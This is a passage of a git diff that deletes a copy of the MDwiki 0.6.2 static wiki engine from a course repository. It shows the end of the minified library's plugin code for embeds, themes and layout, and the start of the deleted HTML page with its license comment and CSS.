getGimmickLinkParts($link){var link_text=$.trim($link.toptext());if(null===link_text.match(/gimmick:/i))return null;var href=$.trim($link.attr("href")),r=new RegExp(/gimmick:\s*([^(\s]*)\s*(\(\s*{?(.*)\s*}?\s*\))*/i),matches=r.exec(link_text);if(null===matches||void 0===matches[1])return $.error("Error matching a gimmick: "+link_text),null;var trigger=matches[1].toLowerCase(),args=null;if(void 0!==matches[2]){var params=$.trim(matches[3].toString());"}"===params.charAt(params.length-1)&&(params=params.substring(0,params.length-1)),params="({"+params+"})",params=params.replace(/'/g,'"');try{args=eval(params)}catch(err){log.error("error parsing argument of gimmick: "+link_text+"giving error: "+err)}}return{trigger:trigger,options:args,href:href}}function runGimmicksOnce(){$.each($.md.gimmicks,function(a,b){void 0!==b.once&&b.once()})}function subscribeLinkTrigger(a,b,c){log.debug("Subscribing gimmick "+c.module.name+" to stage: "+c.stage),$.md.stage(c.stage).subscribe(function(d){b.options=b.options||{},jQuery.contains(document.documentElement,a[0])||(log.error("LINK IS NOT IN THE DOM ANYMORE: "),console.log(a)),log.debug("Running gimmick "+c.module.name),c.callback(a,b.options,b.href,d),d()})}$.md.registerGimmick=function(a){$.md.gimmicks.push(a)},$.md.registerScript=function(a,b,c){var d=new ScriptInfo({module:a,src:b,options:c});registeredScripts.push(d)},$.md.registerCss=function(a,b,c){var d=c.license,e=c.stage||"skel_ready",f=c.callback;checkLicense(d,a);var g='<link rel="stylesheet" href="'+b+'" type="text/css"></link>';$.md.stage(e).subscribe(function(a){$("head").append(g),void 0!==f?f(a):a()})},$.md.prepareLink=function(a,b){b=b||{};var c=window.location.protocol;return b.forceSSL?"https://"+a:b.forceHTTP?"http://"+a:"file:"===c?"http://"+a:"//"+a},$.md.linkGimmick=function(a,b,c,d){void 0===d&&(d="gimmick");var e=new LinkTrigger({trigger:b,module:a,stage:d,callback:c});linkTriggers.push(e)},$.md.triggerIsActive=function(a){return-1===activeLinkTriggers.indexOf(a)?!1:!0};var initialized=!1;$.md.initializeGimmicks=function(){findActiveLinkTrigger(),runGimmicksOnce(),loadRequiredScripts()};var log=$.md.getLogger(),activeLinkTriggers=[],registeredScripts=[],linkTriggers=[],licenses=["MIT","BSD","GPL","GPL2","GPL3","LGPL","LGPL2","APACHE2","PUBLICDOMAIN","EXCEPTION","OTHER"];$.md.registerLinkGimmicks=function(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=$(b),d=getGimmickLinkParts(c);$.each(linkTriggers,function(a,b){d.trigger===b.trigger&&subscribeLinkTrigger(c,d,b)})})}}(jQuery),function(a){function b(){var b;if(a.md.config.title&&a("title").text(a.md.config.title),b=a("#md-content h1").eq(0),a.trim(b.toptext()).length>0){a("#md-title").prepend(b);{b.toptext()}}else a("#md-title").remove()}function c(){a("#md-content p").each(function(){var b=a(this);if(0!==a.trim(b.text()).length){var c=b.contents().filter(function(){var b=a(this);return"A"===this.tagName&&b.find("img").length>0?!0:"IMG"===this.tagName?!0:!1}),d=e(b);b.wrapInner('<div class="md-text" />'),0!==c.length&&(c.prependTo(b),b.addClass("md-floatenv").addClass(d))}})}function d(){a(".md-floatenv").find(".md-text").each(function(){var b=a(this).find("*").eq(0);b.is("br")&&b.remove()}),a(".md-image-group").find("br").remove()}function e(b){var c=a(b),d="",e=c.contents().filter(function(){return"IMG"===this.tagName||"IFRAME"===this.tagName?!0:"A"===this.tagName?a(this).find("img").length>0:a.trim(a(this).text()).length>0}),f=e[0];return void 0!==f&&null!==f&&(d="IMG"===f.tagName||"IFRAME"===f.tagName?"md-float-left":"A"===f.tagName&&a(f).find("img").length>0?"md-float-left":"md-float-right"),d}function f(){var b=a("p img").parents("p");b.addClass("md-image-group")}function g(){function b(){return c=a("img").filter(function(){var b=a(this).parents("a").eq(0);if(0===b.length)return!0;var c=b.attr("href");return c&&0===c.length})}var c=b();return c.each(function(){var b=a(this),c=b.attr("src"),d=b.attr("title");void 0===d&&(d=""),b.wrap('<a class="md-image-selfref" href="'+c+'" title="'+d+'"/> ')})}function h(){function b(b,c){var d=a.md.config.anchorCharacter,e=a('<span class="anchor-highlight"><a>'+d+"</a></span>");e.find("a").attr("href",c),e.hide();var f=!1;b.mouseenter(function(){f=!0,a.md.util.wait(300).then(function(){f&&e.fadeIn(200)})}),b.mouseleave(function(){f=!1,e.fadeOut(200)}),e.appendTo(b)}function c(b){if(a.md.config.useSideMenu!==!1&&"H2"===b.prop("tagName")){var c=a.md.config.tocAnchor;if(""!==c){var d=a('<a class="visible-xs visible-sm jumplink" href="#md-page-menu">'+c+"</a>");d.click(function(b){b.preventDefault(),a("body").scrollTop(a("#md-page-menu").position().top)}),0===b.parents("#md-menu").length&&d.insertAfter(b)}}}a("h1,h2,h3,h4,h5,h6").not("#md-title h1").each(function(){var d=a(this);d.addClass("md-inpage-anchor");var e=d.clone().children(".anchor-highlight").remove().end().text(),f=a.md.util.getInpageAnchorHref(e);b(d,f),c(d)})}var i={createBasicSkeleton:function(){b(),c(),g(),f(),d(),h(),a.md.stage("all_ready").subscribe(function(b){""!==a.md.inPageAnchor&&a.md.util.wait(500).then(function(){a.md.scrollToInPageAnchor(a.md.inPageAnchor)}),b()})}};a.md.publicMethods=a.extend({},a.md.publicMethods,i),a.md.scrollToInPageAnchor=function(b){b.startsWith("#")&&(b=b.substring(1,b.length));var c=!1;a(".md-inpage-anchor").each(function(){if(!c){var d=a(this),e=d.toptext(),f=a.md.util.getInpageAnchorText(e);if(b===f){this.scrollIntoView(!0);var g=a(".navbar-collapse").height()+5;window.scrollBy(0,-g+5),c=!0}}})}}(jQuery),function(a){"use strict";function b(){if(!(a("#md-menu").length<=0)){o="top";var b=a("#md-menu").children(),c="";c+='<div id="md-main-navbar" class="navbar navbar-default navbar-fixed-top" role="navigation">',c+='<div class="navbar-header">',c+='<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">',c+='<span class="sr-only">Toggle navigation</span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+='<span class="icon-bar"></span>',c+="</button>",c+='<a class="navbar-brand" href="#"></a>',c+="</div>",c+='<div class="collapse navbar-collapse navbar-ex1-collapse">',c+='<ul class="nav navbar-nav" />',c+='<ul class="nav navbar-nav navbar-right" />',c+="</div>",c+="</div>";var e=a(c);e.appendTo("#md-menu"),a("#md-menu ul.nav").eq(0).append(b),a("#md-menu").prependTo("#md-all");var f=a("#md-menu h1").toptext();a("#md-menu h1").remove(),a("a.navbar-brand").text(f),a("#md-body").css("margin-top","70px"),a.md.stage("pregimmick").subscribe(function(a){d(),a()})}}function c(){var b=a("#md-main-navbar").height()+10;a("#md-body").css("margin-top",b+"px")}function d(){var b=0,d=a.md.util.repeatUntil(40,function(){return b=a("#md-main-navbar").height(),b>35&&481>b},25);d.done(function(){b=a("#md-main-navbar").height(),c();var d=a.md.util.repeatUntil(20,function(){return b!==a("#md-main-navbar").height()
-},25);d.done(function(){c()}),a.md.util.wait(2e3).done(function(){c()})})}function e(){if(0!==a("#md-menu a").length){var c=a("#md-menu");c.find('> a[href=""]').attr("data-toggle","dropdown").addClass("dropdown-toggle").attr("href","").append('<b class="caret"/>'),c.find("ul").addClass("dropdown-menu"),c.find("ul li").addClass("dropdown"),a("#md-menu hr").each(function(b,c){var d=a(c),e=d.prev(),f=d.next();e.is("ul")&&e.length>=0&&(e.append(a('<li class="divider"/>')),d.remove(),f.is("ul")&&(f.find("li").appendTo(e),f.remove()))}),a("#md-menu ul").each(function(b,c){var d=a(c);0===d.find("li").length&&d.remove()}),a("#md-menu hr").replaceWith(a('<li class="divider-vertical"/>')),a("#md-menu > a").wrap("<li />"),a("#md-menu ul").each(function(b,c){var d=a(c);d.appendTo(d.prev()),d.parent("li").addClass("dropdown")}),a("#md-menu li.dropdown").find("h1, h2, h3").each(function(b,c){var d=a(c),e=d.toptext(),f=a('<li class="dropdown-header" />');f.text(e),d.replaceWith(f)}),b()}}function f(b){var c=a(b),d=a(window).scrollTop(),e=d+a(window).height(),f=c.offset().top,g=f+c.height();return e>=g&&f>=d}function g(){var b=a("#md-content").find("h2").clone();if(b.children().remove(),!(b.length<=1)){a("#md-content").removeClass("col-md-12"),a("#md-content").addClass("col-md-9"),a("#md-content-row").prepend('<div class="col-md-3" id="md-left-column"/>');var c=function(){var b=a("#md-left-column").css("width");a("#md-page-menu").css("width",b)};a(window).scroll(function(){c(a("#md-page-menu"));var b;a("*.md-inpage-anchor").each(function(c,d){if(void 0===b){var e=a(d);f(e)&&(b=e)}}),a("#md-page-menu a").each(function(c,d){var e=a(d);b&&e.toptext()===b.toptext()&&(a("#md-page-menu a.active").removeClass("active"),e.addClass("active"))})});var e=a('<div id="md-page-menu" />'),g=70;e.affix({offset:130}),e.css("top",g);var h=a('<div class="panel panel-default"><ul class="list-group"/></div>'),i=h.find("ul");e.append(h),b.each(function(b,c){var d=a(c),e=a('<li class="list-group-item" />'),f=a("<a />");f.attr("href",a.md.util.getInpageAnchorHref(d.toptext())),f.click(function(b){b.preventDefault();var c=a(this),d=a.md.util.getInpageAnchorText(c.toptext());a.md.scrollToInPageAnchor(d)}),f.text(d.toptext()),e.append(f),i.append(e)}),a(window).resize(function(){c(a("#md-page-menu")),d()}),a.md.stage("postgimmick").subscribe(function(a){a()}),a("#md-left-column").append(e)}}function h(){a("#md-title").wrap('<div class="container" id="md-title-container"/>'),a("#md-title").wrap('<div class="row" id="md-title-row"/>'),a("#md-menu").wrap('<div class="container" id="md-menu-container"/>'),a("#md-menu").wrap('<div class="row" id="md-menu-row"/>'),a("#md-content").wrap('<div class="container" id="md-content-container"/>'),a("#md-content").wrap('<div class="row" id="md-content-row"/>'),a("#md-body").wrap('<div class="container" id="md-body-container"/>'),a("#md-body").wrap('<div class="row" id="md-body-row"/>'),a("#md-title").addClass("col-md-12"),a("#md-content").addClass("col-md-12")}function i(){var b=a('<div class="page-header" />');a("#md-title").wrapInner(b)}function j(){if(0!==a("#md-menu").find("li").length){var b=window.location.hash;0===b.length&&(b="#!index.md");var c='li:has(a[href="'+b+'"])';a("#md-menu").find(c).addClass("active")}}function k(){var b=a("p img").parents("p");b.each(function(){function b(b,c){return d.each(function(b,d){var e=a(d),f=e.parent("a");f.length>0?f.wrap(c):e.wrap(c)})}var c=a(this),d=a(this).find("img").filter(function(){return 0===a(this).parents("a").length}).add(a(this).find("img")).addClass("img-responsive").addClass("img-thumbnail");c.hasClass("md-floatenv")?1===d.length?b(d,'<div class="col-sm-8" />'):2===d.length?b(d,'<div class="col-sm-4" />'):b(d,'<div class="col-sm-2" />'):1===d.length?b(d,'<div class="col-sm-12" />'):2===d.length?b(d,'<div class="col-sm-6" />'):3===d.length?b(d,'<div class="col-sm-4" />'):4===d.length?b(d,'<div class="col-sm-3" />'):b(d,'<div class="col-sm-2" />'),c.addClass("row")})}function l(){a("iframe.md-external").not(".md-external-nowidth").attr("width","450").css("width","450px"),a("iframe.md-external").not(".md-external-noheight").attr("height","280").css("height","280px"),a("div.md-external").not(".md-external-noheight").css("height","280px"),a("div.md-external").not(".md-external-nowidth").css("width","450px")}function m(){var b="";b+='<hr><div class="scontainer">',b+='<div class="pull-right md-copyright-footer"> ',b+='<span id="md-footer-additional"></span>',b+='Website generated with <a href="http://www.mdwiki.info">MDwiki</a> ',b+="&copy; Timo D&ouml;rr and contributors. ",b+="</div>",b+="</div>";var c=a(b);c.css("position","relative"),c.css("margin-top","1em"),a("#md-all").append(c)}function n(){var b=a.md.config.additionalFooterText;b&&a(".md-copyright-footer #md-footer-additional").html(b)}a.mdbootstrap=function(b){return a.mdbootstrap.publicMethods[b]?a.mdbootstrap.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.mdbootstrap")},a.mdbootstrap.events=[],a.mdbootstrap.bind=function(b,c){a(document).bind(b,c),a.mdbootstrap.events.push(b)},a.mdbootstrap.trigger=function(b){a(document).trigger(b)};var o="",p={bootstrapify:function(){h(),e(),i(),k(),a("table").addClass("table").addClass("table-bordered"),a.md.stage("pregimmick").subscribe(function(b){a.md.config.useSideMenu!==!1&&g(),m(),n(),b()}),a.md.stage("postgimmick").subscribe(function(a){l(),j(),a()})}};a.mdbootstrap.publicMethods=a.extend({},a.mdbootstrap.publicMethods,p)}(jQuery),function(a){a.gimmicks=a.fn.gimmicks=function(b){return void 0!==b?a.fn.gimmicks.methods[b]?a.fn.gimmicks.methods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Gimmick "+b+" does not exist on jQuery.gimmicks"):void 0}}(jQuery),function(a){function b(){var b=a(c());b.each(function(){var b=a(this.p),c=this.alertType;b.addClass("alert"),"note"===c?b.addClass("alert-info"):"hint"===c?b.addClass("alert-success"):"warning"===c&&b.addClass("alert-warning")})}function c(){var b=["note","beachte"],c=["achtung","attention","warnung","warning","atención","guarda","advertimiento"],d=["hint","tipp","tip","hinweis"],e=b.concat(c);e=e.concat(d);var f=[];return a("p").filter(function(){var g=a(this);a(e).each(function(e,h){var i=g.text().toLowerCase(),j=new RegExp(h+"(:|!)+.*","i"),k="none";null!==i.match(j)&&(a.inArray(h,b)>=0?k="note":a.inArray(h,c)>=0?k="warning":a.inArray(h,d)>=0&&(k="hint"),f.push({p:g,alertType:k}))})}),f}var d={name:"alerts",load:function(){a.md.stage("bootstrap").subscribe(function(a){b(),a()})}};a.md.registerGimmick(d)}(jQuery),function(a){var b={name:"colorbox",load:function(){a.md.stage("gimmick").subscribe(function(b){a.gimmicks("colorbox"),b()})}};a.md.registerGimmick(b);var c={colorbox:function(){var b;b=a(this instanceof jQuery?this:".md-image-group");var c=0;return b.each(function(){var b=a(this),d="gallery-group-"+c++;b.find("a.md-image-selfref img").parents("a").colorbox({rel:d,opacity:.75,slideshow:!0,maxWidth:"95%",maxHeight:"95%",scalePhotos:!0,photo:!0,slideshowAuto:!1})})}};a.gimmicks.methods=a.extend({},a.fn.gimmicks.methods,c)}(jQuery),function(a){"use strict";function b(b,c,d){var e=a('<div id="myCarousel" class="carousel slide"></div>'),f=a('<div class="carousel-inner"/>');e.append('<ol class="carousel-indicators" />');var g=[];a.each(d.split(","),function(b,c){g.push(a.trim(c)),e.find("ol").append('<li data-target="#myCarousel" data-slide-to="'+b+'" class="active" /');var d;d=0===b?'<div class="active item"/>':'<div class="item"/>',f.append(a(d).append('<img src="'+c+'"/>'))}),e.append(f),e.append('<a class="carousel-control left" href="#myCarousel" data-slide="prev">&lsaquo;</a>'),e.append('<a class="carousel-control right" href="#myCarousel" data-slide="next">&rsaquo;</a>'),b.replaceWith(e)}var c={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"carousel",b)}};a.md.registerGimmick(c)}(jQuery),function(a){var b={name:"disqus",version:a.md.version,once:function(){a.md.linkGimmick(this,"disqus",d)}};a.md.registerGimmick(b);var c=!1,d=function(b,d){var e={identifier:""},f=a.extend(e,d),g=a('<div id="disqus_thread" class="md-external md-external-noheight md-external-nowidth" ><a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></div>');return g.css("margin-top","2em"),b.each(function(b,d){if(c!==!0){c=!0;var e=a(d),h=e.attr("href");void 0!==h&&h.length>0&&(e.remove(),a("#md-content").append(g),a("#disqus_thread").length>0&&!function(){var a,b=window.location.href;a=f.identifier.length>0?f.identifier:b;var c=document.createElement("script");c.type="text/javascript",c.async=!0,c.src="http://"+h+".disqus.com/embed.js",(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]).appendChild(c)}())}})}}(jQuery),function(a){function b(b,c){var d={layout:"standard",showfaces:!0},f=a.extend({},d,c);return"boxcount"===f.layout&&(f.layout="box_count"),"buttoncount"===f.layout&&(f.layout="button_count"),b.each(function(b,c){var d=a(c),g=d.attr("href");a("body").append(e);var h=a('<div class="fb-like" data-send="false" data-width="450"></div>');h.attr("data-href",g),h.attr("data-layout",f.layout),h.attr("data-show-faces",f.showfaces),d.replaceWith(h)})}var c=window.navigator.userLanguage||window.navigator.language,d=c+"_"+c.toUpperCase(),e=a('<div id="fb-root" />'),f=a.md.prepareLink("connect.facebook.net/"+d+"/all.js#xfbml=1",{forceHTTP:!0}),g='(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "'+f+'"; fjs.parentNode.insertBefore(js, fjs);}(document, "script", "facebook-jssdk"));',h={name:"FacebookLike",version:a.md.version,once:function(){a.md.linkGimmick(this,"facebooklike",b),a.md.registerScript(this,g,{license:"APACHE2",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(h)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var e=a(d),f={color:"red",position:"right"},g=a.extend({},f,c),h=g.color,i=g.position,j="https://s3.amazonaws.com/github/ribbons/forkme_";"red"===h&&(j+=i+"_red_aa0000.png"),"green"===h&&(j+=i+"_green_007200.png"),"darkblue"===h&&(j+=i+"_darkblue_121621.png"),"orange"===h&&(j+=i+"_orange_ff7600.png"),"white"===h&&(j+=i+"_white_ffffff.png"),"gray"===h&&(j+=i+"_gray_6d6d6d.png");var k=e.attr("href"),l=0,m=a('<a class="forkmeongithub" href="'+k+'"><img style="position: absolute; top: '+l+";"+i+': 0; border: 0;" src="'+j+'" alt="Fork me on GitHub"></a>');a("body").prepend(m),m.find("img").css("z-index","2000"),e.remove()})}var c={name:"forkmeongithub",version:a.md.version,once:function(){a.md.linkGimmick(this,"forkmeongithub",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c,d){return a().lazygist("init"),b.each(function(b,c){var e=a(c),f=a('<div class="gist_here" data-id="'+d+'" />');e.replaceWith(f),f.lazygist({url_template:"https://gist.github.com/{id}.js?"})})}var c={name:"gist",once:function(){a.md.linkGimmick(this,"gist",b)}};a.md.registerGimmick(c)}(jQuery),function(a,b,c,d){"use strict";function e(b){var e,f,g;if(-1!==b.indexOf('rel="stylesheet"'))f=a(b).attr("href"),-1===a.inArray(f,k)&&(a("head").append(b),k.push(f));else if(-1!==b.indexOf('id="gist')){if(e=/gist([\d]{1,})/g.exec(b),g=e[1],g!==d){if(-1!==a.inArray(g,l))return;l.push(g),a(".gist_here[data-id="+g+"]").append(b)}}else j.apply(c,arguments)}var f,g="lazygist",h="0.2pre",i={url_template:"https://gist.github.com/{id}.js?file={file}",id:"data-id",file:"data-file"},j=c.write,k=[],l=[],m=[],n={init:function(b){return f=a.extend({},i,b),c.write=e,a.each(f,function(a,b){if("string"!=typeof b)throw new TypeError(b+" ("+typeof b+") is not a string")}),this.lazygist("load")},load:function(){return this.filter("["+f.id+"]").each(function(){var b,c=a(this).attr(f.id),e=a(this).attr(f.file);if(c!==d){if(-1!==a.inArray(c,m))return;m.push(c),b=f.url_template.replace(/\{id\}/g,c).replace(/\{file\}/g,e),a.getScript(b,function(){})}})},reset_write:function(){return c.write=j,this}};a.fn[g]=function(b){return n[b]?n[b].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof b&&b?void a.error("Method "+b+" does not exist on jQuery.lazygist"):n.init.apply(this,arguments)},a.fn[g].version=h}(jQuery,window,document);var googlemapsLoadDone;!function(a){function b(b,d){{var e=b;(new Date).getTime()}return e.each(function(b,e){var f=a(e),g={zoom:11,marker:!0,scrollwheel:!1,maptype:"roadmap"},h=a.extend({},g,d);void 0===h.address&&(h.address=f.attr("href"));var i="google-map-"+Math.floor(1e5*Math.random()),j=a('<div class="md-external md-external-nowidth" id="'+i+'"/>');f.replaceWith(j),c(h,i)})}function c(b,c){var d=b.maptype.toUpperCase();b.mapTypeId=google.maps.MapTypeId[d];var e=new google.maps.Geocoder;e.geocode({address:b.address},function(d,e){if("OK"===e){var f=d[0].geometry.location,g=a.extend({},b,{center:f}),h=new google.maps.Map(document.getElementById(c),g);if(g.marker===!0){new google.maps.Marker({position:f,map:h})}}})}var d="http://maps.google.com/maps/api/js?sensor=false&callback=googlemapsReady",e={name:"googlemaps",version:a.md.version,once:function(){googlemapsLoadDone=a.Deferred(),a.md.linkGimmick(this,"googlemaps",b),a.md.registerScript(this,d,{license:"EXCEPTION",loadstage:"skel_ready",finishstage:"bootstrap"}),a.md.stage("bootstrap").subscribe(function(b){a.md.triggerIsActive("googlemaps")?googlemapsLoadDone.done(function(){b()}):b()})}};a.md.registerGimmick(e)}(jQuery),function(a){function b(){var b=a("pre code[class^=lang-]");return b.each(function(){var b=a(this),c=b.attr("class"),d=c.substring(5);b.removeClass(c),b.addClass(d);hljs.highlightBlock(b[0])})}var c={name:"highlight",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){return b.each(function(b,d){var e=a(d),f=e.attr("href"),g=a('<iframe class="col-md-12" style="border: 0px solid red; height: 650px;"></iframe>');if(g.attr("src",f),e.replaceWith(g),c.width&&g.css("width",c.width),c.height)g.css("height",c.height);else{var h=function(){var b=g.offset(),c=a(window).height(),d=c-b.top-5;g.height(d)};g.load(function(){h()}),a(window).resize(function(){h()})}})}var c={name:"iframe",version:a.md.version,once:function(){a.md.linkGimmick(this,"iframe",b)}};a.md.registerGimmick(c)}(jQuery),function(a){function b(b){b.remove();var c=document.createElement("script");c.type="text/javascript",c.src=a.md.prepareLink("cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML",{forceHTTP:!0}),document.getElementsByTagName("head")[0].appendChild(c)}var c={name:"math",once:function(){a.md.linkGimmick(this,"math",b)}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";var b=[{name:"bootstrap",url:"netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css"},{name:"amelia",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/amelia/bootstrap.min.css"},{name:"cerulean",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cerulean/bootstrap.min.css"},{name:"cosmo",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cosmo/bootstrap.min.css"},{name:"cyborg",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/cyborg/bootstrap.min.css"},{name:"flatly",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/flatly/bootstrap.min.css"},{name:"journal",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/journal/bootstrap.min.css"},{name:"readable",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/readable/bootstrap.min.css"},{name:"simplex",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/simplex/bootstrap.min.css"},{name:"slate",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/slate/bootstrap.min.css"},{name:"spacelab",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/spacelab/bootstrap.min.css"},{name:"united",url:"netdna.bootstrapcdn.com/bootswatch/3.0.0/united/bootstrap.min.css"},{name:"yeti",url:"netdna.bootstrapcdn.com/bootswatch/3.0.2/yeti/bootstrap.min.css"}],c=!1,d={name:"Themes",version:a.md.version,once:function(){a.md.linkGimmick(this,"themechooser",h,"skel_ready"),a.md.linkGimmick(this,"theme",g)}};a.md.registerGimmick(d);var e=a.md.getLogger(),f=function(c){if(c.inverse=c.inverse||!1,void 0===c.url){if(!c.name)return void e.error("Theme name must be given!");var d=b.filter(function(a){return a.name===c.name})[0];if(!d)return void e.error("Theme "+name+" not found, removing link");c=a.extend(c,d)}a('link[rel=stylesheet][href*="netdna.bootstrapcdn.com"]').remove();var f=a("style[id*=bootstrap]").length>0;"bootstrap"===c.name&&f||(a("style[id*=bootstrap]").remove(),a('<link rel="stylesheet" type="text/css">').attr("href",a.md.prepareLink(c.url)).appendTo("head")),c.inverse===!0?(a("#md-main-navbar").removeClass("navbar-default"),a("#md-main-navbar").addClass("navbar-inverse")):(a("#md-main-navbar").addClass("navbar-default"),a("#md-main-navbar").removeClass("navbar-inverse"))},g=function(b,d,e){d.name=d.name||e,b.each(function(b,e){a.md.stage("postgimmick").subscribe(function(b){a(e);void 0!==window.localStorage.theme&&c||f(d),b()})}),b.remove()},h=function(d,e,f){return c=!0,a.md.stage("bootstrap").subscribe(function(a){i(e),a()}),d.each(function(c,d){var e=a(d),g=a('<a href=""></a><ul></ul>');g.eq(0).text(f),a.each(b,function(b,c){var d=a("<li></li>");g.eq(1).append(d);a("<a/>").text(c.name).attr("href","").click(function(a){a.preventDefault(),window.localStorage.theme=c.name,window.location.reload()}).appendTo(d)}),g.eq(1).append('<li class="divider" />');var h=a("<li/>"),i=a("<a>Use default</a>");i.click(function(a){a.preventDefault(),window.localStorage.removeItem("theme"),window.location.reload()}),h.append(i),g.eq(1).append(h),g.eq(1).append('<li class="divider" />'),g.eq(1).append('<li><a href="http://www.bootswatch.com">Powered by Bootswatch</a></li>'),e.replaceWith(g)})},i=function(b){window.localStorage.theme&&(b=a.extend({name:window.localStorage.theme},b),f(b))}}(jQuery),function(a){var b=a.md.prepareLink("platform.twitter.com/widgets.js"),c='!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="'+b+'";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");',d={name:"TwitterGimmick",version:a.md.version,once:function(){a.md.linkGimmick(this,"twitterfollow",e),a.md.registerScript(this,c,{license:"EXCEPTION",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(d);var e=function(b){return b.each(function(b,c){var d,e=a(c),f=e.attr("href");if(f.indexOf("twitter.com")<=0){d=e.attr("href"),f=a.md.prepareLink("twitter.com/"+d),"@"===d[0]&&(d=d.substring(1));var g=a('<a href="'+f+'" class="twitter-follow-button" data-show-count="false" data-lang="en" data-show-screen-name="false">@'+d+"</a>");e.replaceWith(g)}})}}(jQuery),function(a){function b(){var b=a("a[href*=youtube\\.com]:empty, a[href*=youtu\\.be]:empty");b.each(function(){var b=a(this),c=b.attr("href");if(void 0!==c){var d=/.*(?:youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=)([^#\&\?]*).*/,e=c.match(d);if(e&&11===e[1].length){var f=e[1],g=a('<iframe class="md-external" frameborder="0" allowfullscreen></iframe>');g.attr("src","http://youtube.com/embed/"+f),b.replaceWith(g)}}})}var c={name:"youtube",load:function(){a.md.stage("gimmick").subscribe(function(a){b(),a()})}};a.md.registerGimmick(c)}(jQuery),function(a){"use strict";function b(b,c){var d={type:"class",style:"plain",direction:"LR",scale:"100"},e=a.extend({},d,c);return b.each(function(b,c){var d=a(c),f="http://yuml.me/diagram/",g=d.attr("href"),h=d.attr("title");h=h?h:"",g=g.replace(new RegExp("`","g"),"(").replace(new RegExp("´","g"),")"),f+=e.style+";dir:"+e.direction+";scale:"+e.scale+"/"+e.type+"/"+g;var i=a('<img src="'+f+'" title="'+h+'" alt="'+h+'">');d.replaceWith(i)})}var c={name:"yuml",version:a.md.version,once:function(){a.md.linkGimmick(this,"yuml",b),a.md.registerScript(this,"",{license:"LGPL",loadstage:"postgimmick",finishstage:"all_ready"})}};a.md.registerGimmick(c)}(jQuery);</script>
-<!-- END dist/MDwiki.min.js -->
-
-</head>
-<body>
-    <noscript>
-        This website requires Javascript to be enabled. Please turn on Javascript
-        and reload the page.
-    </noscript>
-
-    <div id="md-all">
-    </div>
-</body>
-</html>
diff --git a/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim_1.html b/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim_1.html
deleted file mode 100755
index a88a5010..00000000
--- a/IntroClassFiles/mdwiki-0.6.2/mdwiki-slim_1.html
+++ /dev/null
@@ -1,187 +0,0 @@
-<!DOCTYPE html>
-<html>
-<!--
-   This is MDwiki v0.6.2
-   (C) 2013 by Timo Dörr and contributors. This software is licensed
-   under the terms of the GNU GPLv3 with additional terms applied.
-   See https://github.com/Dynalon/mdwiki/blob/master/LICENSE.txt for more detail.
-   See http://github.com/Dynalon/mdwiki for a copy of the source code.
--->
-<head>
-    <title>MDwiki</title>
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <meta name="fragment" content="!">
-    <link rel="shortcut icon" type="image/x-icon" href="favicon.png" />
-    <meta charset="UTF-8">
-    <style type="text/css">
-    /* hide the main content while we assemble everything */
-    .md-hidden-load { display: none; }
-
-    .anchor-highlight {
-        font-size: 0.7em;
-        margin-left: 0.25em;
-    }
-    /* for pageContentMenu */
-    #md-page-menu {
-            position: static;
-    }
-    #md-page-menu a.active {
-        /* background-color: rgba(0, 0, 0, 0.01); */
-        font-weight: bold;
-        padding-left: 6px;
-
-    }
-    @media (min-width: 992px) {
-        #md-page-menu.affix {
-            position: fixed;
-        }
-    }
-    @media (min-width: 768px) {
-        .md-float-left .col-sm-8, .md-float-right .col-sm-8 {
-            max-width: 66.67%;
-        }
-        .md-float-left .col-sm-4, .md-float-right .col-sm-4  {
-            max-width: 33.33%;
-        }
-        .md-float-left .col-sm-2, .md-float-right .col-sm-2 {
-            max-width: 16.67%;
-        }
-
-    }
-    @media (max-width: 992px) {
-        a.forkmeongithub {
-            display: none;
-        }
-    }
-    @media (max-width: 768px) {
-        /* don't use floating for smaller screens */
-        .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-        .md-float-right .col-sm-8, .md-float-right .col-sm-4, .md-float-right .col-sm-2 {
-            width: 100%;
-            max-width: !important;
-            min-width: 100%;
-        }
-    }
-
-    .md-floatenv .md-text {
-        /* md-text is not of md-col-* but needs the spacing */
-        margin-left: 15px;
-        margin-right: 15px;
-    }
-
-    /* float images */
-    .md-float-left .col-sm-8, .md-float-left .col-sm-4, .md-float-left .col-sm-2 {
-        width: auto;
